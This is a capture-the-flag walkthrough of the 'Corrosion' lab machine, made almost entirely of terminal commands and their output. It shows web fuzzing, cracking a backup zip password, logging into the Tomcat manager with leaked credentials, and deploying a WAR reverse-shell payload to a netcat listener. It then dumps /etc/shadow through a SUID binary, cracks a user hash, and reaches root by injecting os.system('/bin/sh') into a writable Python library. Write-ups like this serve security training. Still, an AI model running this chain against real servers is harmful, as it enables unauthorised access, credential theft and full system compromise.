Port recognition withnmap

┌──(root@ghost)-[/home/ghost]
└─# nmap --min-rate 5000 -sV corrosion.vuln   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-04 19:39 EST
Nmap scan report for corrosion.vuln (10.0.2.92)
Host is up (0.000062s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
8080/tcp open  http    Apache Tomcat 9.0.53
MAC Address: 08:00:27:81:64:BF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.45 seconds

Nmap reports three open ports 22 for ssh, 80 for apache and 8080 for apache tomcat

┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c -t 100 --hc=404 -z file,/usr/share/dirb/wordlists/common.txt http://corrosion.vuln:8080/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://corrosion.vuln:8080/FUZZ
Total requests: 4614

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000000001:   200        198 L    490 W      11136 Ch    "http://corrosion.vuln:8080/"                                                                                                      
000001319:   302        0 L      0 W        0 Ch        "docs"                                                                                                                             
000001519:   302        0 L      0 W        0 Ch        "examples"                                                                                                                         
000001575:   200        21 L     132 W      21588 Ch    "favicon.ico"                                                                                                                      
000001920:   302        0 L      0 W        0 Ch        "host-manager"                                                                                                                     
000002436:   302        0 L      0 W        0 Ch        "manager"                                                                                                                          

Total time: 3.791455
Processed Requests: 4614
Filtered Requests: 4608
Requests/sec.: 1216.946
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c -t 100 --hc=404 -z file,/usr/share/dirb/wordlists/common.txt -z list,php-html-txt-bak-zip http://corrosion.vuln:8080/FUZZ.FUZ2Z
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://corrosion.vuln:8080/FUZZ.FUZ2Z
Total requests: 23070

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000002815:   200        120 L    1306 W     32107 Ch    "backup - zip"                                                                                                                     
000016463:   200        2 L      29 W       153 Ch      "readme - txt"                                                                                                                     

Total time: 18.43840
Processed Requests: 23070
Filtered Requests: 23068
Requests/sec.: 1251.192

Fuzzing apache tomcat server

┌──(root@ghost)-[/home/ghost]
└─# curl -s http://corrosion.vuln:8080/backup.zip -o backup.zip

Downloading backup.zip file

┌──(root@ghost)-[/home/ghost]
└─# unzip backup.zip
Archive:  backup.zip
[backup.zip] catalina.policy password:

The file is protected with password

┌──(root@ghost)-[/home/ghost]
└─# zip2john backup.zip 2>/dev/null > hash

Converting zip to john hash format

┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
@administrator_hi5 (backup.zip)     
1g 0:00:00:01 DONE (2023-03-04 20:04) 0.6756g/s 7761Kp/s 7761Kc/s 7761KC/s @alex123..@aal?~112
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We cracked the password of the zip file

┌──(root@ghost)-[/home/ghost]
└─# unzip backup.zip
Archive:  backup.zip
[backup.zip] catalina.policy password: 
  inflating: catalina.policy         
  inflating: context.xml             
  inflating: catalina.properties     
  inflating: jaspic-providers.xml    
  inflating: jaspic-providers.xsd    
  inflating: logging.properties      
  inflating: server.xml              
  inflating: tomcat-users.xml        
  inflating: tomcat-users.xsd        
  inflating: web.xml

Extracting compressed files

┌──(root@ghost)-[/home/ghost]
└─# grep -r 'username' tomcat-users.xml
you must define such a user - the username and password are arbitrary.
  <user username="admin" password="<must-be-changed>" roles="manager-gui"/>
  <user username="robot" password="<must-be-changed>" roles="manager-script"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
<user username="manager" password="melehifokivai" roles="manager-gui"/>
<user username="admin" password="melehifokivai" roles="admin-gui, manager-gui"/>

Credentials found in tomcat-users.xml file, login http://corrosion.vuln:8080/manager/ as admin:melehifokivai

┌──(root@ghost)-[/home/ghost]
└─# bash shellstorm.sh war 10.0.2.15 1337
added manifest
adding: payload.jsp(in = 1496) (out= 582)(deflated 61%)
adding: WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: WEB-INF/web.xml(in = 258) (out= 182)(deflated 29%)

[+] war file compiled in /tmp/war/payload.war

Generating WAR file with ShellStorm

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.15] from corrosion.vuln [10.0.2.92] 35650
tomcat@corrosion:/var/spool/cron$  

After browse our war file, click on deploy tab. Then with our netcat listener set visit http://corrosion.vuln:8080/payload/ to get the reverse shell

tomcat@corrosion:/home/randy$ cat user.txt
ca73a018ae6908a7d0ea5d1c269ba4b6

Here the user flag

tomcat@corrosion:/home/randy$ ls /home
jaye  randy
tomcat@corrosion:/home/randy$ su jaye
su jaye
Password: melehifokivai

$ script /dev/null -c bash
Script started, file is /dev/null
jaye@corrosion:/home/randy$

Reusing password to pivot between user accounts

jaye@corrosion:/home/randy$ find / -perm -u=s 2>/dev/null
...
/home/jaye/Files/look
...
jaye@corrosion:/home/randy$ ls -la /home/jaye/Files/look
---s--s--x 1 root root 14728 Sep 17  2021 /home/jaye/Files/look

This program can read files as root privileged

jaye@corrosion:/home/randy$ /home/jaye/Files/look '' /etc/shadow
root:$6$fHvHhNo5DWsYxgt0$.3upyGTbu9RjpoCkHfW.1F9mq5dxjwcqeZl0KnwEr0vXXzi7Tld2lAeYeIio/9BFPjUCyaBeLgVH1yK.5OR57.:18888:0:99999:7:::
daemon:*:18858:0:99999:7:::
bin:*:18858:0:99999:7:::
sys:*:18858:0:99999:7:::
sync:*:18858:0:99999:7:::
games:*:18858:0:99999:7:::
man:*:18858:0:99999:7:::
lp:*:18858:0:99999:7:::
mail:*:18858:0:99999:7:::
news:*:18858:0:99999:7:::
uucp:*:18858:0:99999:7:::
proxy:*:18858:0:99999:7:::
backup:*:18858:0:99999:7:::
list:*:18858:0:99999:7:::
irc:*:18858:0:99999:7:::
gnats:*:18858:0:99999:7:::
nobody:*:18858:0:99999:7:::
systemd-network:*:18858:0:99999:7:::
systemd-resolve:*:18858:0:99999:7:::
systemd-timesync:*:18858:0:99999:7:::
messagebus:*:18858:0:99999:7:::
syslog:*:18858:0:99999:7:::
_apt:*:18858:0:99999:7:::
tss:*:18858:0:99999:7:::
uuidd:*:18858:0:99999:7:::
tcpdump:*:18858:0:99999:7:::
avahi-autoipd:*:18858:0:99999:7:::
usbmux:*:18858:0:99999:7:::
rtkit:*:18858:0:99999:7:::
dnsmasq:*:18858:0:99999:7:::
cups-pk-helper:*:18858:0:99999:7:::
speech-dispatcher:!:18858:0:99999:7:::
avahi:*:18858:0:99999:7:::
kernoops:*:18858:0:99999:7:::
saned:*:18858:0:99999:7:::
nm-openvpn:*:18858:0:99999:7:::
hplip:*:18858:0:99999:7:::
whoopsie:*:18858:0:99999:7:::
colord:*:18858:0:99999:7:::
geoclue:*:18858:0:99999:7:::
pulse:*:18858:0:99999:7:::
gnome-initial-setup:*:18858:0:99999:7:::
gdm:*:18858:0:99999:7:::
sssd:*:18858:0:99999:7:::
randy:$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/:18888:0:99999:7:::
systemd-coredump:!!:18886::::::
tomcat:$6$XD2Bs.tL01.5OT2b$.uXUR3ysfujHGaz1YKj1l9XUOMhHcKDPXYLTexsWbDWqIO9ML40CQZPI04ebbYzVNBFmgv3Mpd3.8znPfrBNC1:18888:0:99999:7:::
sshd:*:18887:0:99999:7:::
jaye:$6$Chqrqtd4U/B1J3gV$YjeAWKM.usyi/JxpfwYA6ybW/szqkiI1kerC4/JJNMpDUYKavQbnZeUh4WL/fB/4vrzX0LvKVWu60dq4SOQZB0:18887:0:99999:7:::

Reading /etc/shadow

┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
07051986randy    (randy)     
1g 0:00:07:02 DONE (2023-03-04 21:05) 0.6060g/s 1666p/s 1666c/s 1666C/s 24brandy..!brandyn!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Cracked randy hash

┌──(root@ghost)-[/home/ghost]
└─# ssh randy@corrosion.vuln
randy@corrosion.vuln's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.11.0-34-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

19 updates can be applied immediately.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
randy@corrosion:~$ 

Connected as randy via ssh

randy@corrosion:~$ sudo -l
[sudo] password for randy: 
Matching Defaults entries for randy on corrosion:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User randy may run the following commands on corrosion:
    (root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py

Randy can execute /usr/bin/python3.8 /home/randy/randombase64.py as root

randy@corrosion:~$ ls -la randombase64.py
-rwxr-xr-x 1 root root 210 Sep 20  2021 randombase64.py
randy@corrosion:~$ cat randombase64.py
import base64

message = input("Enter your string: ")
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')

print(base64_message)

We can't modify randombase64.py file

randy@corrosion:~$ find / base64 2>/dev/null | grep python | grep base64 | grep -v '/snap'
/usr/lib/python3.8/encodings/base64_codec.py
/usr/lib/python3.8/encodings/__pycache__/base64_codec.cpython-38.pyc
/usr/lib/python3.8/__pycache__/base64.cpython-38.pyc
/usr/lib/python3.8/email/base64mime.py
/usr/lib/python3.8/email/__pycache__/base64mime.cpython-38.pyc
/usr/lib/python3.8/base64.py
randy@corrosion:~$ ls -la /usr/lib/python3.8/base64.py
-rwxrwxrwx 1 root root 20386 Sep 20  2021 /usr/lib/python3.8/base64.py

But how about /usr/lib/python3.8/base64.py has enough permissions for us

randy@corrosion:~$ nano /usr/lib/python3.8/base64.py
#! /usr/bin/python3.8

import os
os.system('/bin/sh')

"""Base16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings"""

# Modified 04-Oct-1995 by Jack Jansen to use binascii module
# Modified 30-Dec-2003 by Barry Warsaw to add full RFC 3548 support
# Modified 22-May-2007 by Guido van Rossum to use bytes everywhere

import re
import struct
import binascii

__all__ = [
    # Legacy interface exports traditional RFC 2045 Base64 encodings
    'encode', 'decode', 'encodebytes', 'decodebytes',
    # Generalized interface for other encodings
    
...

Just import os module to execute '/bin/sh' should work for this kind of python library hijack

randy@corrosion:~$ sudo -u root /usr/bin/python3.8 /home/randy/randombase64.py
# cat /root/root.txt
2fdbf8d4f894292361d6c72c8e833a4b